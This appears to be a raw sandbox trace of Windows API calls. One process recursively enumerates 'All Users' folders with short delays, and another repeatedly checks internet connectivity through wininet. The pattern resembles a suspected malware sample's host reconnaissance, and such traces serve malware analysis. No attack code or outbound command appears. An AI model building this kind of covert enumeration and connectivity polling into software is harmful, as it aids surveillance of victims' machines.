FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xb6\xa9\xb3\xd4I\xcd\x01\x90t\xe2\xcf\xd4I\xcd\x01 \xe7\xcf\xd4I\xcd\x01 \xe7\xcf\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x90t\xe2\xcf\xd4I\xcd\x01\xf0\x82\xe5\xcf\xd4I\xcd\x01\xf0\x82\xe5\xcf\xd4I\xcd\x01\xf0\x82\xe5\xcf\xd4I\xcd\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00r\x00m\x00v\x002\x00.\x00l\x00i\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xe7\xcf\xd4I\xcd\x01 \xe7\xcf\xd4I\xcd\x01 \xe7\xcf\xd4I\xcd\x01 \xe7\xcf\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:50,781 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,781 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,861 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Favorites\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:50,861 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01\x80379oI\xcd\x01\x80379oI\xcd\x01\x80379oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:50,861 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:50,861 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,941 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:50,941 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\xb0\xc8\x07(\xf2\x91\xcf\x01@~\xa99\xd5I\xcd\x01@~\xa99\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\xb0 \xc73\xf2\x91\xcf\x01`uH\xd8\xd4I\xcd\x01`uH\xd8\xd4I\xcd\x01&\x01\x00\x00\x00\x00\x00\x00(\x01\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\xe0O (\xf2\x91\xcf\x01\xb0\xa9\xb7\xe4\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:50,941 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:50,981 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:50,981 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:50,981 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:50,981 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:50,981 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:51,022 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\*.* |
SUCCESS | 0x0016ce40 | |
| 07:43:51,022 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\xe0O (\xf2\x91\xcf\x01\xb0\xa9\xb7\xe4\xe6\x91\xcf\x01\xb0\xa9\xb7\xe4\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x00\xd4\xc2T\xd4I\xcd\x01\x10\xd7 (\xf2\x91\xcf\x01\xf0\xbb\x1d\x96\xd4I\xcd\x01\xf0\xbb\x1d\x96\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00c\x00e\x00s\x00s\x00o\x00r\x00i\x00e\x00s\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x80\x01p\x8b\xd4I\xcd\x01\x00{\x12(\xf2\x91\xcf\x01P\xa67\xd8\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,022 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,102 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:51,102 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xd4\xc2T\xd4I\xcd\x01\x10\xd7 (\xf2\x91\xcf\x01\xf0\xbb\x1d\x96\xd4I\xcd\x01\xf0\xbb\x1d\x96\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\x90%\xb3\x8d\xd4I\xcd\x01\x10\xd7 (\xf2\x91\xcf\x01\x90%\xb3\x8d\xd4I\xcd\x01\x90%\xb3\x8d\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00c\x00c\x00e\x00s\x00s\x00i\x00b\x00i\x00l\x00i\x00t\x00y\x00\x80\x00\x00\x00\x00\x00\x00\x00\xc09\x9c\x8d\xd4I\xcd\x01\x10\xca\4\xf2\x91\xcf\x01\xf0\xc0\x9d\x8d\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,102 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,182 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:51,182 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90%\xb3\x8d\xd4I\xcd\x01\x10\xd7 (\xf2\x91\xcf\x01\x90%\xb3\x8d\xd4I\xcd\x01\x90%\xb3\x8d\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezo\x90\x00\x00\x00\x00\x00\x00\x00\x90%\xb3\x8d\xd4I\xcd\x01\xa0_a4\xf2\x91\xcf\x01\x90%\xb3\x8d\xd4I\xcd\x01\x90%\xb3\x8d\xd4I\xcd\x01\xf0\x05\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00.\x00L\x00N\x00K\x00A\x00c\x00c\x00e\x00s\x00s\x00i\x00b\x00i\x00l\x00i\x00t\x00y\x00 \x00W\x00i\x00z\x00a\x00r\x00d\x00.\x00l\x00n\x00k\x00\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:51,182 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,182 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,382 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:51,382 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xd4\xc2T\xd4I\xcd\x01p\xe5 (\xf2\x91\xcf\x01\xb0'S\xd8\xd4I\xcd\x01\xb0'S\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezox\x00\x00\x00\x00\x00\x00\x00\x90i\xc7T\xd4I\xcd\x01\xb0\xbbY4\xf2\x91\xcf\x01pDY\xd8\xd4I\xcd\x01pDY\xd8\xd4I\xcd\x01\xc0\x01\x00\x00\x00\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00t\x00y\x00\x80\x00\x00\x00\x00\x00\x00\x00\xd0\x08\xad\x8d\xd4I\xcd\x01\xd0\xe6b4\xf2\x91\xcf\x01\x00\x90\xae\x8d\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,392 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,392 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,472 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:51,472 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x90\xae\x8d\xd4I\xcd\x01\xa0l\x0f(\xf2\x91\xcf\x01`\x9e\xb1\x8d\xd4I\xcd\x01`\x9e\xb1\x8d\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezox\x00\x00\x00\x00\x00\x00\x000\x17\xb0\x8d\xd4I\xcd\x01\xe0B[4\xf2\x91\xcf\x01`\x9e\xb1\x8d\xd4I\xcd\x01`\x9e\xb1\x8d\xd4I\xcd\x01\x92\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00t\x00y\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x90\xae\x8d\xd4I\xcd\x01\xf0\x11l4\xf2\x91\xcf\x010\x17\xb0\x8d\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,472 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,472 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,552 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:51,552 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xc0\x9d\x8d\xd4I\xcd\x01\x00{\x12(\xf2\x91\xcf\x01p\x05\xab9\xd5I\xcd\x01p\x05\xab9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00Timezox\x00\x00\x00\x00\x00\x00\x00\xc0\x83K\xd8\xd4I\xcd\x01\xb0.r4\xf2\x91\xcf\x01\xc0\x83K\xd8\xd4I\xcd\x01\xc0\x83K\xd8\xd4I\xcd\x01\xfc\x05\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x00a\x00c\x00k\x00u\x00p\x00.\x00l\x00n\x00k\x00i\x00t\x00y\x00\x80\x00\x00\x00\x00\x00\x00\x00 H\x9f\x8d\xd4I\xcd\x01\xe0\xb5s4\xf2\x91\xcf\x01P\xcf\xa0\x8d\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,552 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,552 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,552 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,632 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:51,632 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x01p\x8b\xd4I\xcd\x01\x00{\x12(\xf2\x91\xcf\x01P\xa67\xd8\xd4I\xcd\x01P\xa67\xd8\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x90\x00\x00\x00\x00\x00\x00\x00\x80\x01p\x8b\xd4I\xcd\x01\xe0(\x8c4\xf2\x91\xcf\x01\x80\x01p\x8b\xd4I\xcd\x01\x80\x01p\x8b\xd4I\xcd\x01.\x06\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00O\x00M\x00P\x00O\x00N\x00~\x001\x00.\x00L\x00N\x00K\x00C\x00o\x00m\x00p\x00o\x00n\x00e\x00n\x00t\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00s\x00.\x00l\x00n\x00k\x00\4\xf2\x91\xcf\x01\x90\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:51,632 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,632 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,713 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Games\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:51,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90%\xb3\x8d\xd4I\xcd\x01`\x89\x15(\xf2\x91\xcf\x01\x90\x98\xcb\x8d\xd4I\xcd\x01\x90\x98\xcb\x8d\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\xc0\xac\xb4\x8d\xd4I\xcd\x01 &U4\xf2\x91\xcf\x01\xc0\x1f\xcd\x8d\xd4I\xcd\x01\xc0\x1f\xcd\x8d\xd4I\xcd\x01\x1e\x03\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00e\x00r\x00x\x00\x00\x00\x00\x00\x00\x00\xf03\xb6\x8d\xd4I\xcd\x01@\x1d\xc04\xf2\x91\xcf\x01 \xbb\xb7\x8d\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,713 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,783 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:51,783 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:51,783 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:51,783 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:51,783 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:51,793 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Google Chrome\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:51,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x966Q\xe0\x91\xcf\x01\x90\xcf\xca4\xf2\x91\xcf\x01`\x966Q\xe0\x91\xcf\x01`\x966Q\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00`\x966Q\xe0\x91\xcf\x01\xf0\xdd\xcd4\xf2\x91\xcf\x01`\x966Q\xe0\x91\xcf\x01`\x966Q\xe0\x91\xcf\x01!\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00G\x00O\x00O\x00G\x00L\x00E\x00~\x001\x00.\x00L\x00N\x00K\x00G\x00o\x00o\x00g\x00l\x00e\x00 \x00C\x00h\x00r\x00o\x00m\x00e\x00.\x00l\x00n\x00k\x00 |
SUCCESS | 0x00000000 | |
| 07:43:51,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,803 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,883 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Python 2.7\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:51,883 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0?\xec\xc6\xe0\x91\xcf\x01P\xec\xd04\xf2\x91\xcf\x01\x10:\x06\xc7\xe0\x91\xcf\x01\x10:\x06\xc7\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x88\x00\x00\x00\x00\x00\x00\x00\xa0\\xf2\xc6\xe0\x91\xcf\x01\x80s\xd24\xf2\x91\xcf\x01\xa0\\xf2\xc6\xe0\x91\xcf\x01\xa0\\xf2\xc6\xe0\x91\xcf\x01p\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x18\x00I\x00D\x00L\x00E\x00(\x00P\x00~\x001\x00.\x00L\x00N\x00K\x00I\x00D\x00L\x00E\x00 \x00(\x00P\x00y\x00t\x00h\x00o\x00n\x00 \x00G\x00U\x00I\x00)\x00.\x00l\x00n\x00k\x00\x80\x00\x00\x00\x00\x00\x00\x00\xd0\xe3\xf3\xc6\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:51,883 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,883 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:51,963 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*.* |
SUCCESS | 0x0016ce78 | |
| 07:43:51,963 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01`\x89\x15(\xf2\x91\xcf\x01\x80\x91\xef\x9b\xe4\x91\xcf\x01\x80\x91\xef\x9b\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x00\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01 &U4\xf2\x91\xcf\x01\x90\x891\xd8\xd4I\xcd\x01\x90\x891\xd8\xd4I\xcd\x01T\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:51,963 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,963 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,963 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:51,963 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,043 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Templates\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:52,043 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x80379oI\xcd\x01\x80379oI\xcd\x01\x80379oI\xcd\x01\x80379oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:52,043 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:52,043 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:52,043 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:52,123 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\*.* |
SUCCESS | 0x0016cd68 | |
| 07:43:52,133 | 504 | NtQueryDirectoryFile |
